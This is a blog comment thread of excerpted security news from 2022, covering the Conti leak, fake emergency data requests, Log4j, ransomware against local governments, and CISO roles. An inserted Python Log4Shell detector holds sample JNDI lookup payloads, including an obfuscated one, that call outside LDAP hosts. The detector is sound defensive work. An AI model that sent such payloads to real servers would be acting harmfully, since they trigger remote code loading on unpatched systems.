A separate legal proposal also discussed today would stop transfers being made to “non-compliant” crypto service providers, which includes those operating in the EU without authorization or that are not affiliated to or established in any jurisdiction.
The Thursday vote came in spite of objections from major industry participants, such as Coinbase, and from legal experts who warned that overly heavy handed privacy violations could face legal challenges in EU courts.
Under the new rules, Coinbase would have to report to the authorities any time a customer received over EUR 1,000 of crypto from a self-hosted wallet, the exchange’s CEO Brian Armstrong warned in a tweet posted Wednesday.
Tomi Engdahl says:
Sean Lyngaas / CNN:
Interview with pseudonymous Ukrainian IT specialist Danylo, who released chat logs from the Russia-linked Conti ransomware gang, on his motivations and more
‘I can fight with a keyboard’: How one Ukrainian IT specialist exposed a notorious Russian ransomware gang
By Sean Lyngaas, CNN
https://edition.cnn.com/2022/03/30/politics/ukraine-hack-russian-ransomware-gang/
Washington (CNN) As Russian artillery began raining down on his homeland last month, one Ukrainian computer researcher decided to fight back the best way he knew how — by sabotaging one of the most formidable ransomware gangs in Russia.
Four days into Russia’s invasion, the researcher began publishing the biggest leak ever of files and data from Conti, a syndicate of Russian and Eastern Europe cybercriminals wanted by the FBI for conducting attacks on hundreds of US organizations and causing millions of dollars in losses.
The thousands of internal documents and communications include evidence that appears to suggest Conti operatives have contacts within the Russian government, including the FSB intelligence service. That supports a longstanding US allegation that Moscow has colluded with cybercriminals for strategic advantage.
The Ukrainian computer specialist behind the leak spoke exclusively to CNN and described his motivation for seeking revenge after Conti operatives published a statement in support of the Russian government immediately after the invasion of Ukraine. He also described his desperate efforts to track down loved ones in Ukraine in recent weeks.
To protect his identity, CNN agreed to refer to him by a pseudonym: Danylo.
“I cannot shoot anything, but I can fight with a keyboard and mouse,” Danylo told CNN.
The trove of data Danylo leaked in late February illustrates why cybersecurity has been such a fraught issue in US-Russia relations. It includes cryptocurrency accounts the Conti hackers used to allegedly reap millions of dollars in ransom payments, their discussions of how to extort US companies and their apparent targeting of a journalist investigating the poisoning of Kremlin critic Alexey Navalny.
But it also shows how hard it can be to disable ransomware operations. Despite Danylo unmasking their operations, the hackers continue to announce new victim organizations.
Danylo, who has worked as a cybersecurity researcher for years and studied the underground cybercriminal economy in Europe, is just one vigilante in a shadow war that has emerged between hackers and cybersecurity executives who have pledged support for the Ukrainian and Russian governments as the biggest land war in Europe since World War II drags on.
But by disrupting a group as notorious as Conti, Danylo has gained more attention than others. The FBI, Danylo said, contacted him after he began to leak the Conti files, asking him to stop leaking.
CNN corroborated Danylo’s claim that he was the leaker by reviewing evidence that he had access to the Twitter account that was publishing the Conti data, as well as a website that Danylo and another person, who was granted anonymity for their protection, were using to share data contained in the leaks.
Digital retribution
Danylo claims that he first gained access to computer systems used by what would become the Conti syndicate in 2016. Though he declined to explain in detail how he did this, independent security experts have verified to CNN the dataset belongs to the hackers. (Conti is both the name of malicious software and the cybercriminal syndicate that uses it. The group is also affiliated with TrickBot, another hacking tool used in numerous ransomware attacks.)
“Sometimes they make mistakes,” Danylo said, referring to ransomware groups. “You need to catch them when they make a mistake. I just was in the right place at the right time. I was monitoring them.”
For years, Danylo said, he quietly lurked on the hackers’ computer servers and would pass along information on the group’s operations to European law enforcement officials.
Conti ransomware has been rampant in the last two years, with the hackers claiming numerous victims a week.
The dark work was lucrative: hackers using the Conti ransomware received at least $25.5 million in ransom payments in the span of just four months in 2021, according to Elliptic, a firm that tracks cryptocurrency transactions.
But something snapped in Danylo on February 25, 2022, when Conti operatives published a statement pledging their “full support” for the Russian government as it attacked Ukraine.
A Russian airstrike had landed not far from a family member’s house. The cybersecurity researcher grew up in Ukraine when it was part of the Soviet Union. He didn’t want to see it slip back into Russian hands.
Conti members tried to walk their statement back, claiming they weren’t supporting any government, but Danylo had heard enough.
Asked again why he dumped the Conti data, Danylo said with a laugh: “To prove that they are motherf**kers.” He was exhausted from a long day navigating military checkpoints in Ukraine, on the hunt for cigarettes and looking to the sky for signs of the next air raid.
Contacted by the FBI
Conti is exactly the type of prolific ransomware group that President Joe Biden last year exhorted Russian President Vladimir Putin to bring to heel amid a spate of attacks on US critical infrastructure.
After he started leaking the data, Danylo said, an FBI special agent contacted him and asked him to stop. Exposing Conti infrastructure could, in theory, make it more difficult for the FBI to track the group because it might set up new computer systems.
Danylo has stopped leaking for now. But he says he still has access to some Conti computer systems.
At least one law enforcement official who spoke to CNN would have preferred that Danylo had maintained that covert access, rather than alert the ransomware syndicate to his presence by leaking the data.
“Publicly releasing information like [the leaker did] is reckless,” a US law enforcement official told CNN. “Working cooperatively with law enforcement can achieve a more substantial and lasting impact in disrupting the operations of groups like Conti.”
But John Fokker, a former cybercrime investigator with the Dutch police, said the leak could actually be useful to cops chasing cyber crooks.
“Yes, infrastructure can be burned. However, the amount of data provided in the leaks make me confident that law enforcement got the information they need to write indictments on key individuals,” said Fokker, who works closely with European law enforcement as head of cyber investigations at security firm Trellix.
A catalog of misdeeds
The Conti leaks are a startling catalog of the alleged misdeeds of a multimillion-dollar criminal enterprise.
CNN evaluated and translated the original cache of documents that Danylo shared with the world via Twitter.
The communications show Conti members, each going by aliases in the chat logs, discussing the wisdom of extorting US small businesses, seemingly refraining from hacking Russian targets, and taking an interest in a journalist writing about Navalny, the Russian opposition figure who has been jailed and poisoned.
Conti operatives refer in their chats to Liteyny Avenue in St. Petersburg, which happens to be home to local FSB offices, according to Kimberly Goody, director of cyber crime analysis at security firm Mandiant.
“Generally speaking, it would be relatively unsurprising to learn that an operation as extensive as this would not in some way be leveraged as an asset [by the Russian government] at a point in time,” Goody told CNN.
‘It’s my work’
Cyberattacks have played a supporting role in the war in Ukraine. The White House has accused the Russian GRU military intelligence agency of knocking key Ukrainian government websites offline prior to the invasion. (A charge the Kremlin denies.) US officials are also investigating a hack of a satellite network serving parts of Ukraine, which occurred as the Russian invasion began, as a potential Russian state-sponsored hack, CNN previously reported.
For its part, the Ukrainian government has encouraged an “IT army” of volunteer hackers in Ukraine and abroad to conduct cyberattacks on Russian organizations.
In the free-for-all that is Ukrainian cyberspace, combatants like Danylo engage on their own terms.
After weeks of living the war, Danylo told CNN he slipped safely out of Ukraine with his laptop this week.
Tomi Engdahl says:
Hackers Gaining Power of Subpoena Via Fake “Emergency Data Requests”
https://krebsonsecurity.com/2022/03/hackers-gaining-power-of-subpoena-via-fake-emergency-data-requests/
There is a terrifying and highly effective “method” that criminal hackers are now using to harvest sensitive customer data from Internet service providers, phone companies and social media firms. It involves compromising email accounts and websites tied to police departments and government agencies, and then sending unauthorized demands for subscriber data while claiming the information being requested can’t wait for a court order because it relates to an urgent matter of life and death.
Tomi Engdahl says:
The Semiconductor Security War
https://www.youtube.com/watch?v=8G39EK4qyrk
Modern chips own your life. For instance, take the A15 SOC that is sitting inside your iPhone. Inside that chip are multiple security assets of high corporate value: encryption keys, developer keys, DRM keys, and so on.
Furthermore, imagine how much of your life’s business is conducted through your mobile phone. For instance, my phone has my biometric information, my bank access information, passwords to all my services, and so on.
Software security protections are frequently implemented with the tenet that “trust starts in silicon”. But a house cannot be built on soft sand. Likewise, a secure system cannot be architected on top of compromised hardware.
In this video, I want to talk about the daunting problem of maintaining security in today’s modern semiconductors.
Tomi Engdahl says:
Suzanne Smalley / CyberScoop:
Sources: Biden administration considers changing a Trump-era policy which let DoD and Cyber Command authorize cyber operations without White House approval — The Biden administration is reviewing whether and how to change a Trump-era policy which gave unprecedented authority to the Department …
https://www.cyberscoop.com/biden-trump-nspm-13-presidential-memo-cyber-command-white-house/
Tomi Engdahl says:
We don’t trust you. We don’t trust anyone. You have your agenda and we have ours. Safe is better than new, shiny, and sexy. That’s it. We carry the burden of the company, you carry the burden of your group. Our agenda just trumps yours. We are nimble and change with the landscape. You want to run insecure versions of Visual Studio and download programs from fuckyourenviroment.com. We are different.
Tomi Engdahl says:
Good point: organized crime has a turnover of 110 billion euros a year in the EU area.
https://polamk.fi/-/tutkimus-jarjestaytyneen-rikollisuuden-liikevaihto-110-miljardia-euroa-vuodessa-eu-alueella
Tomi Engdahl says:
Russia may disrupt Finland’s NATO debate by striking at a sore spot https://www.is.fi/digitoday/art-2000008719816.html
RUSSIA is expected to direct cyber and information influence operations at Finland in the coming months. At a press conference it held on Tuesday, the Finnish Security and Intelligence Service (Suojelupoliisi) said it considers it likely that attempts will be made to influence the NATO debate being held in Finland in particular. Doctor of Technology and cybersecurity expert Catharina Candolin believes that false and negative information will be heard in the NATO debate.
Tomi Engdahl says:
Two-factor authentication is definitely a good thing, but when poorly implemented it too can be bypassed https://www.tivi.fi/uutiset/tv/fd6faa84-5d3f-40c9-a630-7e4e91fd79ba
When talking about logins to devices, systems and services, multi-factor authentication is definitely a better option than just a username and password. Still, if multi-factor authentication is poorly implemented, it too can be bypassed. Wired reports on cautionary examples. Original:
https://www.wired.com/story/multifactor-authentication-prompt-bombing-on-the-rise/
Tomi Engdahl says:
A Finnish Anonymous hacker strikes against Russia with methods like those of intelligence agencies https://www.is.fi/digitoday/art-2000008720782.html
The Finnish Anonymous hacker began his cyber war against Russia after the country attacked Ukraine. The operations have become ever more heavy-handed. The activity is illegal, and he knows it.
Tomi Engdahl says:
Experts Warn Defenders: Don’t Relax on Log4j
https://www.securityweek.com/experts-warn-defenders-dont-relax-log4j
It’s been four months since the Log4j issue exploded onto the internet. All the major software vendors affected by it have by now released patches – but even where companies have patched, it would be wrong to relax.
Log4j is the name of a logging software library used by many different applications. It has also become the name of an attack using the Log4j library (the attack is also known as Log4Shell). The attack is not so much a vulnerability but the manipulation of a feature of the library – and because ‘exploitation’ is merely the effect of using this feature in a malicious manner, widescale exploitation began within 48 hours of the possibility becoming public knowledge.
All that is required by an attacker is getting the log to contain a specific text message. If the library has internet access, that message effectively beacons out to a server controlled by the attacker, and the attacker can gain access.
There are two solutions: one is waiting for software vendors to release patches and implementing those patches as quickly as possible; and the other is to use basic cyber resilience (in this case blocking and tackling, or ‘default deny’ on firewalls) to prevent Log4j beaconing out to the malicious server. The problem is that many companies do not have default deny properly implemented, while in the best patching scenario there was most likely a delay of several weeks before the patch was tested, delivered and implemented.
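The article describes the attack as getting a log to contain a specific text message that then beacons out to an attacker-controlled server. The following is an added detection example, not code from the article or from the Log4j project: it normalizes the nested-lookup forms commonly used to disguise the `${jndi:...}` string, flags matching lines, and extracts the callback hosts so they can feed the egress “default deny” list the article recommends. The log lines are constructed samples, and the normalizer is a heuristic that only handles the `lower`, `upper` and `:-` default forms.

```python
import re

# Constructed sample log lines (not from the article). Line 2 carries a plain
# lookup, line 3 a nested one that hides the keyword, line 4 is benign text
# that merely mentions JNDI and must not be flagged.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 ua="Mozilla/5.0"',
    '10.0.0.7 - - "GET /login HTTP/1.1" 404 ua="${jndi:ldap://203.0.113.9/a}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 '
    'ua="${${lower:j}ndi:${lower:l}dap://198.51.100.4/x}"',
    'INFO app started, jndi lookups disabled via config',
]

# An innermost ${...} lookup: its body contains no further "${" or "}".
_INNER = re.compile(r"\$\{([^${}]*)\}")
# The string we are ultimately looking for, after normalization.
_JNDI = re.compile(r"\$\{jndi:", re.IGNORECASE)
# scheme://host of a JNDI lookup, used to build an egress block list.
_URL = re.compile(r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^/:\s}]+)",
                  re.IGNORECASE)


def _resolve_one(match: re.Match) -> str:
    """Collapse one innermost lookup roughly the way the library's string
    substitution would, for the handful of forms used to disguise 'jndi'.
    Heuristic (assumption): unknown prefixes keep their text minus the
    braces, so every character survives and substring matching still works."""
    body = match.group(1)
    prefix, sep, rest = body.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        return match.group(0)            # keep the lookup itself intact
    if ":-" in body:                     # ${anything:-default} -> default
        return body.split(":-", 1)[1]
    if sep and prefix == "lower":        # ${lower:J} -> j
        return rest.lower()
    if sep and prefix == "upper":        # ${upper:j} -> J
        return rest.upper()
    return body                          # unknown: drop braces, keep text


def normalize(text: str, max_rounds: int = 20) -> str:
    """Repeatedly collapse innermost lookups until nothing changes, so that
    ${${lower:j}ndi:${lower:l}dap://h/x} becomes ${jndi:ldap://h/x}.
    Bounded so hostile input cannot keep the loop busy."""
    for _ in range(max_rounds):
        new = _INNER.sub(_resolve_one, text)
        if new == text:
            break
        text = new
    return text


def is_log4shell_probe(line: str) -> bool:
    """True when the line contains a JNDI lookup after normalization."""
    return bool(_JNDI.search(normalize(line)))


def scan_log(lines):
    """(line_number, normalized_line) for every flagged line; the normalized
    form is returned so analysts see the de-obfuscated lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        norm = normalize(line)
        if _JNDI.search(norm):
            hits.append((number, norm))
    return hits


def callback_endpoints(lines):
    """Sorted (scheme, host) pairs the flagged lines try to reach. Feeding
    these to an egress deny list supports the 'default deny' mitigation,
    which blocks the library from beaconing out even before patching."""
    found = set()
    for _, norm in scan_log(lines):
        for m in _URL.finditer(norm):
            found.add((m.group("scheme").lower(), m.group("host")))
    return sorted(found)


if __name__ == "__main__":
    for number, norm in scan_log(SAMPLE_LOG_LINES):
        print(f"line {number}: {norm}")
    print("egress hosts to deny:", callback_endpoints(SAMPLE_LOG_LINES))
```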
Tomi Engdahl says:
FBI Warns of Ransomware Attacks Targeting Local Governments
https://www.securityweek.com/fbi-warns-ransomware-attacks-targeting-local-governments
The Federal Bureau of Investigation (FBI) this week warned local government entities of ransomware attacks disrupting operational services, causing public safety risks, and causing financial losses.
In a Private Industry Notification (PIN), the FBI underlined the significance of such attacks, due to the public’s dependency on services overseen by local governments, including critical utilities, education, and emergency services.
According to the FBI, local government entities within the government facilities sector (GFS) represented the second most targeted group following academia, based on victim incident reporting throughout 2021.
Last year, smaller counties and municipalities represented the majority of victimized local government agencies, “likely indicative of their cybersecurity resource and budget limitations,” the FBI says.
Based on an independently-conducted survey, local governments are the least able to prevent ransomware attacks and recover from backups, and often pay the ransom to get the data back.
Ransomware Attacks Straining Local US Governments and Public Services
https://www.ic3.gov/Media/News/2022/220330.pdf
Tomi Engdahl says:
PCI Data Security Standard v4.0 Released to Address Emerging Threats
https://www.securityweek.com/pci-data-security-standard-v40-released-address-emerging-threats
The PCI Security Standards Council (SSC), the organization that oversees the Payment Card Industry Data Security Standard (PCI DSS), this week announced the release of PCI DSS v4.0.
PCI DSS 4.0 replaces version 3.2.1, which PCI SSC released in 2018. The goal of the latest version of the standard is to “address emerging threats and technologies and enable innovative methods to combat new threats” to customer payment information.
The changes highlighted by PCI SSC include the implementation of MFA for all access to cardholder data environments, the replacement of the term “firewalls” with “network security controls” to support a broader range of security technologies, and increased flexibility for organizations to show how they are using different methods for achieving security objectives. Many of the new requirements are related to targeted risk analysis.
PCI DSS 4.0, detailed in a 360-page document, was created based on feedback from more than 200 members of the global payments industry. A summary of the changes is presented in a separate document.
Payment Card Industry Data Security Standard
https://www.pcisecuritystandards.org/documents/PCI-DSS-v4_0.pdf?agreement=true&time=1648815252915
Summary of Changes from PCI DSS Version 3.2.1 to 4.0
https://www.pcisecuritystandards.org/documents/PCI-DSS-Summary-of-Changes-v3_2_1-to-v4_0.pdf?agreement=true&time=1648815252916
Tomi Engdahl says:
The Importance of Open Source to an XDR Architecture
https://www.securityweek.com/importance-open-source-xdr-architecture
No longer satisfied with infecting files or systems, adversaries are now intent on crippling entire enterprises. Damaging supply chain, ransomware and wiper attacks are making headline news, impacting not only the organization but their stakeholders too. As threat actors’ approaches and targets change, our approach to detection and response is changing as well.
Extended Detection and Response (XDR) is now widely considered to be the most effective path forward to enable detection and response across the infrastructure, across all attack vectors, across different vendors, and across security technologies that are cloud based and on premises. Delivering on this promise requires ALL tools and ALL teams working in concert, so the “X factor” in an XDR architecture is integration. And this integration must be broad and deep so that organizations can get the most value out of their existing best-of-breed security solutions, including their free, open source tools.
Tomi Engdahl says:
Editorial: We must prepare for disruptions of banking services https://www.kauppalehti.fi/uutiset/pankkipalveluiden-hairioihin-tulee-varautua/2d126a18-3672-42aa-becb-b5676d117c7d
As a result of Russia’s war of aggression against Ukraine, the risk of cyberattacks has also risen in Finland. One form of so-called hybrid warfare is cyberattacks against critical infrastructure. Critical infrastructure includes, for example, electricity distribution, telecommunications and banking functions.
Tomi Engdahl says:
ISO Files With Office Maldocs & Protected View in Office 2019 and 2021 https://blog.didierstevens.com/2022/04/04/iso-files-with-office-maldocs-protected-view-in-office-2019-and-2021/
We have seen ISO files being used to deliver malicious documents via email. There are different variants of this attack. One of the reasons to do this, is to evade “mark-of-web propagation”.
Tomi Engdahl says:
Hackers breach MailChimp’s internal tools to target crypto customers https://www.bleepingcomputer.com/news/security/hackers-breach-mailchimps-internal-tools-to-target-crypto-customers/
Email marketing firm MailChimp disclosed on Sunday that they had been hit by hackers who gained access to internal customer support and account management tools to steal audience data and conduct phishing attacks. Sunday morning, Twitter was abuzz with reports from owners of Trezor hardware cryptocurrency wallets who received phishing notifications claiming that the company suffered a data breach.
Tomi Engdahl says:
FIN7 hackers evolve toolset, work with multiple ransomware gangs https://www.bleepingcomputer.com/news/security/fin7-hackers-evolve-toolset-work-with-multiple-ransomware-gangs/
Threat analysts have compiled a detailed technical report on FIN7 operations from late 2021 to early 2022, showing that the adversary continues to be very active, evolving, and trying new monetization methods. FIN7 (a.k.a. Carbanak) is a Russian-speaking, financially motivated actor known for its resourceful and diverse set of tactics, custom-made malware, and stealthy backdoors.
Tomi Engdahl says:
New Android Spyware Uses Turla-Linked Infrastructure
https://www.securityweek.com/new-android-spyware-uses-turla-linked-infrastructure
Lab52 security researchers have dissected a new piece of Android malware that they discovered while analyzing infrastructure associated with Russian cyberespionage group Turla.
While it’s the only malware family to connect to a specific IP address associated with Turla, the spyware can’t be attributed to the infamous APT, “given its threat capabilities,” Lab52 says.
Tomi Engdahl says:
Harnessing Neurodiversity Within Cybersecurity Teams
https://www.securityweek.com/harnessing-neurodiversity-within-cybersecurity-teams
Neurodivergence, by its name, implies a different way of thinking. The question we wish to examine is whether the inclusion of this neurodiversity can bring something positive beyond the simple expansion of general diversity to and within the cybersecurity teams.
Understanding neurodivergence
The world is basically divided into those with neurotypical and those with neurodivergent ways of thinking. Neurotypical is ‘typical’ only because it is more common. Neurodivergent simply diverges from the most common. There is no choice in the type – it is fundamentally governed biologically by how the brain works in different people.
It has been said, from the ‘divergent’ viewpoint, that ‘the ‘normal’ brain is easily distractible, is obsessively social, and suffers from a deficit of attention to detail and routine.’ This is what most people have and must work through, largely using a lineal thought process.
The neurodivergent brain is not cluttered with social complications, has a finely tuned sense of detail and focus, and is not easily distracted (this is called hyperfocus). Most importantly, it has a tendency towards non-linear thinking (for which, read problem solving).
Hyperfocus and non-linear thinking have clear and obvious benefits to problem solving in cybersecurity. But neurodivergence is the minority, and like all minorities requires accommodation from the majority in order to flourish.
The two types of neurodivergence that we shall consider are classified as ADHD and ASD (formerly known as Asperger’s syndrome). It is important to note that there are different types and degrees of ADHD, and that an important (but not defining) difference between ADHD and ASD is the ability to ‘socialize’ within a typical society. Aspects of each classification can also be apparent in the other, but in general, ASD has greater difficulty in social constructs.
Hyperfocus
Neurodivergents are capable of long periods of intense concentration on a single subject. This is called hyperfocus. It is possible in neurotypicals, but the focus is likely to be disrupted by social, image and other neurotypical interruptions that will not interrupt the neurodivergent.
Non-linear thinking
The concept of non-linear thinking (sometimes described as seeing patterns in things not obviously related) is difficult to grasp – especially for the neurotypical mind. Conceptually (this is not a scientific or clinical explanation) think of it like remembering a connection between two stimuli. In cybersecurity, the memory may be that this incident may be associated with that incident and lead to this outcome.
The ability to see the relationships comes from memory. Complex memories are based on connections between different memory snippets. If we don’t have those connections in the memory, we can see neither the problem nor its solution. This is neurotypical problem solving – this can lead to this and result in that. If the incident is not within our linear conception, we do not see it.
The neurodivergent brain does not work like this. It does not rely on known connections stored in memory. Memory is a fog of unrelated incidents that have not been consciously filed as being connected. Nevertheless, the neurodivergent brain can see possible patterns and connections in this much larger fog of incidents and solve problems without being aware of how the solution is achieved.
The closest parallel for neurotypical brains is the idea of ‘sleeping on a problem’. It is not uncommon to be faced with a problem that is so difficult that we give up – yet wake up the next day knowing there is a simple solution. It is our subconscious that works on and solves the problem – possibly in a non-linear fashion – while we are asleep.
Accommodating neurodiversity in the security team
The potential power of harnessing hyperfocus and non-linear problem solving in cybersecurity is obvious. But neurodivergency must be accommodated. The potential for these cybersecurity strengths is not a constant. There will be times where the disadvantages of the conditions are in the ascendency. We’ve all heard the ‘squirrel’ jokes. These can be conceptually accurate but should be considered insensitive (unless both parties are in the same minority). Those periods need to be accepted and helped where possible, and not blindly criticized.
So understanding is key to employing neurodivergency within the security team.
Tomi Engdahl says:
Aaron Schaffer / Washington Post:
The US State Department announces the Bureau of Cyberspace and Digital Policy, starting with 60+ staff and plans to add 30 more in 2022
https://www.washingtonpost.com/politics/2022/04/04/its-big-day-state-department-us-cyberdiplomacy/
Tomi Engdahl says:
US State Department Launches Cyberspace and Digital Diplomacy Bureau
https://www.securityweek.com/us-state-department-launches-cyberspace-and-digital-diplomacy-bureau
The US Department of State on Monday announced the creation of the Bureau of Cyberspace and Digital Policy (CDP).
The new entity was created to deal with national security challenges, but also with the implications of cyberspace and digital technologies and policies on US values.
The CDP bureau was created to lead and coordinate the Department’s cyberspace and digital diplomacy operations, to promote responsible cyberspace behavior and policies.
“The Bureau addresses the national security challenges, economic opportunities, and values considerations presented by cyberspace, digital technologies, and digital policy and promotes standards and norms that are fair, transparent, and support our values,” the Department of State notes.
Three policy units will be part of the CDP bureau, namely Digital Freedom, International Cyberspace Security, and International Information and Communications Policy.
Tomi Engdahl says:
Why Some CISOs Fail
https://www.securityweek.com/why-some-cisos-fail
The CISO’s role is not to simply protect IT against risk – it is to defend the work of all departments, and the profitability of the entire business
The role of Chief Information Security Officer (CISO) is new. It’s just 25 years since Steve Katz became the world’s first known CISO. There is no universally accepted definition of the role, its methods or its responsibilities; and CISOs are left to find or forge their own paths. Some fail to choose or find the right path.
Adolescence
“I would say that the role is in its adolescence right now; not yet fully formed,” says Ben Smith, Field CTO at NetWitness. “We think it’s headed in the right direction, but there’s always room for improvement and growth.”
Adolescence is the age of rebelliousness. “But it’s also the beginning of maturity,” says Chris Morales, CISO at Netenrich.
Reporting
Confusion over the proper role for the CISO can be seen in the ongoing debate over the correct reporting structure. The majority of CISOs report to the CIO, but the number is slowly diminishing. CISOs are demanding, and businesses are recognizing, that however closely the CISO and CIO need to work together, one should neither be subservient nor dependent on the other. There is an inherent conflict of interest in this relationship that can only be solved by each party being on an equal footing.
Morales, who is a successful CISO with a clear sense of purpose, reports to his CEO. “I insisted from the beginning,” he told SecurityWeek. “It was a condition of me accepting the position.”
The precise reporting structure is not critical beyond three conditions: the CISO must have access to the board, should not report to the CIO, and should have his own security budget rather than a percentage of the IT budget controlled by the CIO.
The businessman
The growing maturity of the CISO role can also be seen in the increasing recognition of the need for the CISO to be a businessman, perhaps above and beyond a technologist. This is a process in transition since the majority of existing CISOs have come up ‘through the ranks’ and have a natural grounding in technology. But these CISOs are being forced to acquire business skills to properly fulfill their roles, and to a large extent, their continuing success is dependent on how well they learn these skills.
The need for a CISO to have business skills to better protect the business focus of the company is growing. “I would say,” comments Smith, “that if you enter into a CISO role with the expectation that you’re going to be the most technically capable employee in the security function you are going to fail because that’s not what today’s CISO is all about.” He goes further to say that the ideal makeup for the CISO is a businessman with technology understanding – but if he was forced to choose between a pure technologist and a pure businessman for this role, he would choose the businessman.
The negotiator
An important aspect of being a businessman is the ability to negotiate – and this is essential for the businessman CISO. Traditionally, the CISO has become known as Mr. No. The CISO is responsible for security, and it is too easy to say, or be perceived as saying, ‘No, you can’t do that because it is not secure.’
This can lead to a negative perception of the whole role of cybersecurity, and – in extreme – the exclusion of the CISO from other business discussions. It is better for the CISO to engineer the environment in which he/she can say, ‘Yes, we can do that so long as we do it this way…’ This requires a high level of communication and negotiation skills, and a good rapport with other C-Suite members – especially, of course, with the CIO.
Early attempts to sell the value of security were clumsy. A common claim has been that the business is like a car and security is the brake pedal – it gives the driver confidence to drive faster. But the analogy doesn’t bear analysis.
The role of the modern CISO has become heavily dependent on communication, and the ability to negotiate a mutually acceptable compromise. Without these skills, it is difficult to see how the modern CISO will succeed.
How to succeed as a CISO
The modern business is a complex relationship between information technology, marketing, finance, human resources, legal and other departments. The successful CISO’s role is not to simply protect IT against risk – it is to defend the work of all the departments, and the profitability of the entire business.
To achieve this, the CISO needs to shed his purely technological mantle and to develop new skills of communication, negotiation and willingness to compromise in order to succeed. Metaphorically, the CISO needs to emerge from behind his desk in a corner of the IT department and take or forge a place in the wider business. This is the successful CISO of the future.
Tomi Engdahl says:
Cybersecurity Mesh: IT’s Answer to Cloud Security
https://www.darkreading.com/operations/cybersecurity-mesh-it-s-answer-to-cloud-security
With a properly functioning cybersecurity mesh architecture, one can guarantee safe, authorized access to data from any access point.
The term “cybersecurity mesh” has been around for a couple of years now, but it’s making the rounds again after Gartner declared it the second-highest strategic trend of 2022. To be fair, it is a good term, as it adequately expands upon the zero-trust paradigm. Given that zero trust has been around for nearly two decades, most are familiar with the zero-trust network (ZTN) model. It is the idea that all network access requests should be considered unreliable until proven otherwise.
In a zero-trust environment, all subjects are continuously vetted; all traffic is encrypted; and user health, device health, and session context are all assessed before access is granted to the network. The principle of least privilege is employed, meaning that users are granted access to the least amount of network data for the shortest amount of time necessary to complete a given task. Lastly, multifactor authentication (MFA) and user and entity behavior analytics (UEBA) are employed to protect the network.
The general consensus is that zero-trust security architecture is the way to go, so why do we need this new term, cybersecurity mesh architecture (CSMA)? What was the impetus behind CSMA? In short, the global pandemic. The pandemic created a paradigm shift, whereby organizations rushed to facilitate remote work and cloud migration. IT personnel were faced with the challenge of managing a host of new assets, most of which were well outside of the traditional security perimeter. This all led to the popularization of CSMA.
What Is CSMA?
According to Gartner, CSMA is “a flexible, composable architecture that integrates widely distributed and disparate security services.” Although described as an architecture, CSMA is arguably more of a strategy; it’s an initiative that brings organizations’ security tools closer to the assets that they protect.
An extension of zero trust, CSMA creates unique perimeters around every person, machine, and entity. Much like a regular ZTN model, the identity and context of users and devices are considered; for example, the identity of a person, time of day, and location could be assessed before access is granted. However, with CSMA, things are taken a step further. There are now as many perimeters as there are access points. One can think of this as a form of microsegmentation, whereby every single device and access port is surrounded by a security perimeter.
Mesh architecture moves control ports closer to the assets they need to protect; however, control ultimately still resides in a centralized point. A centralized authority manages all the security perimeters.
Another way to think about CSMA is as an end-to-end ZTN with security tools that are no longer siloed. With CSMA, organizations are encouraged to deploy security solutions that work seamlessly together, rather than security tools working in silos. According to Gartner, CSMA provides this collaborative cybersecurity structure via four different layers.
CSMA’s Supportive Layers
Per Gartner, the supportive layers are security analytics and intelligence; distributed identity fabric; consolidated policy and posture management
Distributed identity fabric denotes a layer comprised of data and connected processes. Within this layer, analytics tools continuously assess data points from disparate applications; these tools not only actively recommend where data should be used and modified, but they also help to differentiate between genuine, approved users and malicious attackers.
Consolidated policy and posture management is the layer through which IT personnel can define application access policies for users and devices — all from a central location.
These layers, which can be thought of as the “data security mesh,” all exist beneath the network layer; put differently, they work together to monitor where data is used, stored, and shared by every user and device in the network. With a properly functioning CSMA, one can guarantee safe, authorized access to data from any access point.
Tomi Engdahl says:
Symantec: Chinese APT Group Targeting Global MSPs
https://www.securityweek.com/symantec-chinese-apt-group-targeting-global-msps
Malware hunters at Broadcom’s Symantec division have spotted signs that a long-running cyberespionage campaign linked to Chinese nation-state hackers is now going after managed service providers (MSPs) with a more global footprint.
In a report issued Tuesday, Symantec said it observed a group known as Cicada (APT10, Stone Panda) expanding its target list to include government, legal, religious, and non-governmental organizations (NGOs) in multiple countries around the world, including in Europe, Asia, and North America.
The company noted that Cicada’s initial activity several years ago was heavily focused on Japanese-linked companies but warned that the group is now hitting managed service providers (MSPs) around the world.
In several newer cases, Symantec’s researchers found evidence that Microsoft Exchange Servers are an entry point for the attackers, suggesting the possibility that a known, unpatched vulnerability in Microsoft Exchange may have been used to gain access to victim networks in some cases.
Tomi Engdahl says:
A line drawn in the network
https://yle.fi/uutiset/3-12370108
Cyberwar has been declared to have begun several times over the past few decades. In hindsight, the declarations have turned out to be premature. Is it different now?
The power went out just before midnight. In December 2016, a fifth of the city of Kyiv went dark for an hour when a cyberattack destroyed a power distribution station outside the capital.
It was a highly advanced piece of malware, designed specifically for Ukraine’s power distribution grid. It was more sophisticated than the cyberattack a year earlier that cut power to more than 220,000 residents in western Ukraine, in which the hackers switched off the flow of electricity manually. Now the malware was able to operate on its own.
The attacks on Ukraine’s power grid were exceptional because they targeted society’s critical infrastructure. It was also exceptional that digital attacks succeeded in causing physical damage.
Tomi Engdahl says:
Build A TPM Module For Your Server
https://hackaday.com/2022/04/06/build-a-tpm-module-for-your-server/
One of the big stories surrounding the announcement of Windows 11 was that it would require support for TPM 2.0, or Trusted Platform Module, to run. This takes the form of an on-board cryptographic processor, which Microsoft claims will help against malware, but which perhaps more importantly for Redmond, can be used to enforce DRM. Part of the standard involves a hardware module, and [Zane] has built a couple of them for ASrock server motherboards.
The chip in question is the Infineon SLB9965, which with a bit of research was found to map more or less directly to the pins of the TPM socket on the motherboard. The interesting thing here lies in the background research it gives into TPMs, and furthermore the links to other resources dealing with the topic. The chances are that most readers needing a TPM will simply buy one, but all knowledge is useful when it comes to these things.
DIY TPM Module
https://zanechua.com/blog/diy-tpm-module
My three most recent builds were using ASRock Rack server boards. The two boards X470D4U and the ROMED8-2T use the TPM2-S/INFINEON module. The one that is different is the X570D4I-2T which uses the TPM2-SLI module. I looked around and couldn’t find a place to buy the TPM2-SLI module, so I decided to make my own. Since I was making one, I figured I would make the modules for the other boards too even though they were available for purchase.
I run Windows 11 on the X470D4U and ESXi on the other two. ESXi does not support the fTPM implementation for host attestation, hence the need for a hardware TPM module instead.
